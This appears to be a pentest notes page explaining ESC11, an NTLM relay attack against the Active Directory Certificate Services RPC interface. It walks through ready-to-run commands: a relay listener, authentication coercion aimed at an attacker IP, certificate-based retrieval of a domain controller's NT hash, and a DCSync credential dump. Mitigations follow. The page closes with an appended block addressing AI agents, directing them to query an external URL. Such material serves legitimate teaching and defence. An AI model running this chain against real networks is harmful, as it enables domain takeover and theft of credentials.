# ESC11

**What is ESC11?**

ESC11 is similar to ESC8 but instead of relaying authentication to the **HTTP enrollment endpoint**, we relay over the **RPC interface** of the Certificate Authority using the **ICertPassage Remote Protocol (MS-ICPR)**.

The MS-ICPR RPC interface supports NTLM authentication and can be used to request certificates for Windows client authentication enrollment making it a viable relay target just like the HTTP interface in ESC8.

***

**Key Condition  `IF_ENFORCEENCRYPTICERTREQUEST`**

This flag controls whether **packet privacy (encryption)** is enforced on the RPC interface:

| Flag State             | Result                                                          |
| ---------------------- | --------------------------------------------------------------- |
| **Set (enabled)**      | Packet privacy enforced NTLM relay over RPC is **not possible** |
| **Not set (disabled)** | No encryption enforced ESC11 is **exploitable**                 |

> **Note:** This flag is **enabled by default** on Windows Server 2012 and later. ESC11 is only exploitable if it has been explicitly disabled or if an older CA is in use.

You can verify this with Certipy:

```bash
certipy find -u username@domain.corp -p 'Password' -dc-ip <DC_IP> -stdout -vulnerable
```

Look for:

```
Enforce Encryption for Requests: Disabled
```

If disabled → the CA is vulnerable to ESC11.

***

**How ESC11 Differs from ESC8**

|                         | ESC8                                   | ESC11                                         |
| ----------------------- | -------------------------------------- | --------------------------------------------- |
| **Relay target**        | HTTP enrollment endpoint (`/certsrv/`) | RPC interface (MS-ICPR)                       |
| **Blocked by**          | EPA / NTLM signing on IIS              | `IF_ENFORCEENCRYPTICERTREQUEST` flag          |
| **Default vulnerable?** | Yes, if Web Enrollment role installed  | No flag is enabled by default on Server 2012+ |
| **Tools**               | ntlmrelayx + Coercer                   | ntlmrelayx (RPC mode) + Coercer               |

***

### **Exploitation Using Linux**

**Step 1  Start the NTLM Relay Listener**

```bash
ntlmrelayx.py -t "rpc://ca.domain.corp" -rpc-mode ICPR -icpr-ca-name "CA-NAME" -smb2support --adcs --template "DomainControllerAuthentication"
```

* `-rpc-mode ICPR`  targets the ICertPassage RPC interface
* `-icpr-ca-name`  must match the exact CA name
* `--template` use `DomainControllerAuthentication` when targeting a DC machine account

***

**Step 2  Coerce Authentication from the Target**

```bash
Coercer.py coerce -l <ATTACKER_IP> -t dc01.domain.corp -u username -p 'Password' -d domain.corp -v --filter-method-name "EfsRpcDuplicateEncryptionInfoFile"
```

Same coercion approach as ESC8 Coercer abuses alternate RPC methods to bypass the patched PetitPotam and SpoolSample vectors.

If relay succeeds, `ntlmrelayx` outputs a `.pfx` certificate for the relayed account.

***

**Step 3 Authenticate and Retrieve NTLM Hash**

```bash
certipy auth -pfx dc01.pfx -dc-ip <DC_IP>
```

This performs **UnPAC-the-Hash**, returning the NT hash of the machine account.

***

**Step 4  DCSync**

```bash
secretsdump.py -hashes :<NT_HASH> 'domain.corp/dc01$@dc01.domain.corp'
```

***

**Mitigation**

| Fix                                       | How                                                                                                         |
| ----------------------------------------- | ----------------------------------------------------------------------------------------------------------- |
| Re-enable `IF_ENFORCEENCRYPTICERTREQUEST` | Run `certutil -config "CA" -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST` then restart `certsvc` |
| Enable NTLM signing                       | Prevents relay at the network level                                                                         |
| Restrict template enrollment              | Limit `DomainControllerAuthentication` template access                                                      |
| Add DCs to Protected Users                | Prevents NTLM auth from DC accounts                                                                         |

To re-enable the flag:

```bash
certutil -config "ca.domain.corp\CA-NAME" -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST
net stop certsvc && net start certsvc
```

***

**Resources**

* [SpecterOps — ESC11: NTLM Relay to AD CS RPC](https://docs.specterops.io/ghostpack-docs/Certify.wik-mdx/esc11-ntlm-relay-to-ad-cs-rpc-interfaces)
* [Pentest Everything — ESC11](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adcs/esc11)
* Altered Security AD CS Lab
* [Certipy Wiki ESC11](https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#ESC11)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc11.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.